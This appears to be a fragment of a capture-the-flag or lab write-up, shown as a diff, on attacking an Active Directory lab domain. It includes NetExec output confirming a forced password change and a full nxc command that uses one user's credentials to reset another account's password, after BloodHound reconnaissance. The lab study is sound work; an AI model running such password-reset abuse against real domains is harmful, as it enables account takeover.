Skip to main content

 SMB 10.129.234.50 445 DC [+] Successfully changed password for Michael.Pontiac

 Excellent!
 The password reset worked.
-Now let me check what Helen Frost’s privileges are.
-From the BloodHound data, I know she has interesting group memberships.
+Time to check Helen Frost’s privileges - the BloodHound data showed interesting group memberships for this account.

 elliot@exegol:~$ nxc smb redelegate.vl -u Marie.Curie -p 'Fall2024!' -M change-password -o USER=Helen.Frost NEWPASS='Elliot1234!'